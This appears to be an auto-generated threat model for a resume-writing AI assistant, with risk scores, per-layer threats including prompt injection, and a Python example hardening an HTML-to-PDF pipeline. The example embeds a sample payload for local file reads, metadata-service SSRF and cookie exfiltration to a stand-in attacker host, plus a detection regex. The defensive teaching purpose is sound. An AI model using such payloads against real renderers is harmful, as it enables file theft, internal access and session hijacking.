Resmume — agentic threat model
Resmume is a low-risk, single-purpose AI assistant focused on resume generation and refinement. Its primary security concerns are data privacy (PII handling) and potential vulnerabilities in its PDF generation pipeline, rather than agentic or autonomous threats.
OWASP AIVSS score rationale
| Agentic risk factor | Score | Rationale |
|---|---|---|
| Autonomy of Action | 0.10 | |
| Goal-Driven Planning | 0.10 | |
| Self-Modification | 0.00 | |
| Dynamic Tool Use | 0.10 | |
| Persistent Memory | 0.10 | |
| Contextual Awareness | 0.20 | |
| Dynamic Identity | 0.00 | |
| Multi-Agent Interactions | 0.00 | |
| Non-Determinism | 0.30 | |
| Opacity & Reflexivity | 0.20 | |
Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
MAESTRO 7-layer threat model
Per-layer threats for this agent. Layers tagged "Not certain from the listing" carry general, caveated commentary because the public description did not pin down that layer.
Layer 1, Foundation Models: Not certain from the listing; likely a standard commercial LLM used for text refinement. Threats include prompt injection carried in the user-supplied resume text that bypasses the tone-refinement instructions or produces inappropriate content, and leakage of resume content if the upstream provider retains prompts or trains on them; that depends on the provider's data-retention terms, which the listing does not state.
Layer 2, Data Operations: Not certain from the listing; likely processes uploaded resume text in real time without a persistent vector store. The main threat is leakage of resume PII (names, contact details, employment history) through transient storage: upload temp files, intermediate HTML/PDF artifacts, application logs, or the LLM provider's request logs.
Layer 3, Agent Frameworks: Not certain from the listing; likely a thin LLM wrapper rather than an agent framework. The main threat is the hand-off to the PDF generation tool: if user text or model output is interpolated unescaped into an HTML template that an HTML-to-PDF renderer loads, injected markup (iframe, img, link or object elements pointing at file:// paths or internal URLs) can make the renderer read local files or reach internal services (SSRF) and embed the result in the PDF returned to the user.
Layer 4, Deployment & Infrastructure: Not certain from the listing; a hosted web application. Threats include standard web vulnerabilities (XSS, CSRF) and outdated or insecurely configured PDF-rendering libraries reachable through crafted resume input; the blast radius depends on whether the renderer runs isolated from the local filesystem and internal network.
Layer 5, Evaluation & Observability: Not certain from the listing; no mention of guardrails or monitoring. Without input validation, output monitoring or rate limits, the service can be used to mass-produce spam or malicious text, and prompt-injection attempts against the refinement step go undetected.
Layer 6, Security & Compliance: Not certain from the listing; the listing mentions "no sign-up processes", which implies no authentication or authorization layer, so there is no per-user access control and no user-bound audit trail for the resume PII it handles. This raises GDPR/CCPA questions about consent, retention and deletion of that data.
Layer 7, Agent Ecosystem: Not certain from the listing; the agent does not interact with other agents or marketplaces. Ecosystem threats are negligible.
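The PDF hand-off threat described under the Agent Frameworks and Deployment layers, as an added example that is not Resmume's code (its actual stack is not public): a hypothetical resume template rendered by string interpolation, the injected markup an HTML-to-PDF engine would follow, and a hardened version that allowlist-sanitises the user's field and escapes everything else. The template, the field names, the constructed payload and the function names (`render_unsafe`, `render_safe`, `sanitize`, `has_active_content`) are all assumptions made for illustration.

```python
"""Added example, not Resmume's code: unsafe vs. hardened interpolation of
resume text into an HTML document that an HTML-to-PDF renderer will load.

Assumption (hypothetical): the app formats user fields into an HTML template
and hands the result to a renderer (headless browser, wkhtmltopdf-style tool)
that follows <iframe>/<img>/<link>/<object> URLs, including file:// ones.
"""
import html
import re
from html.parser import HTMLParser

# Constructed payload a user could paste into the "summary" field.
MALICIOUS_SUMMARY = (
    "Experienced engineer."
    '<iframe src="file:///etc/passwd"></iframe>'           # local file read
    '<img src="http://169.254.169.254/latest/meta-data/">'  # SSRF to metadata
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    "<b>Team lead</b>"                                      # benign formatting
)

TEMPLATE = "<html><body><h1>{name}</h1><p>{summary}</p></body></html>"


def render_unsafe(name, summary):
    """Vulnerable: raw interpolation, so user markup reaches the renderer."""
    return TEMPLATE.format(name=name, summary=summary)


# Only inert formatting tags survive; attributes (src, href, style) never do.
ALLOWED_TAGS = {"b", "i", "em", "strong", "br", "ul", "li", "p"}


class _AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # >0 while inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
        elif tag in ALLOWED_TAGS and self._skip_depth == 0:
            self.out.append(f"<{tag}>")  # attributes deliberately discarded

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag != "br" and self._skip_depth == 0:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip_depth == 0:
            # Re-escape text so a literal '<' or '&' can never form new markup.
            self.out.append(html.escape(data, quote=True))


def sanitize(fragment):
    """Reduce a user-supplied HTML fragment to allowlisted tags and escaped text."""
    parser = _AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_safe(name, summary):
    """Hardened: plain fields are escaped, rich-text fields are allowlist-sanitised."""
    return TEMPLATE.format(name=html.escape(name), summary=sanitize(summary))


# Backstop check before the document is handed to the renderer: refuse anything
# that could make the renderer fetch a URL or load a local file.
ACTIVE_CONTENT = re.compile(
    r"<(iframe|object|embed|script|link|meta|img|base)\b|file://|javascript:", re.I
)


def has_active_content(doc):
    return ACTIVE_CONTENT.search(doc) is not None


if __name__ == "__main__":
    unsafe = render_unsafe("Jane Doe", MALICIOUS_SUMMARY)
    safe = render_safe("Jane Doe", MALICIOUS_SUMMARY)
    print("unsafe document reaches renderer with active content:", has_active_content(unsafe))
    print("hardened document:", safe)
```

The regex is a last-line detector, not the control: the allowlist sanitiser is what removes the injected elements, and the renderer itself should still run without filesystem or internal-network access so that a bypass cannot turn into a file read or SSRF.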
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).
These scores are auto-generated from public information (the agent's own listing, docs, and repository) using the canonical OWASP AIVSS formula and the MAESTRO framework — an estimate for guidance, not a penetration test, audit, or certification. See the scoring methodology. Are you the vendor? Factual corrections are free.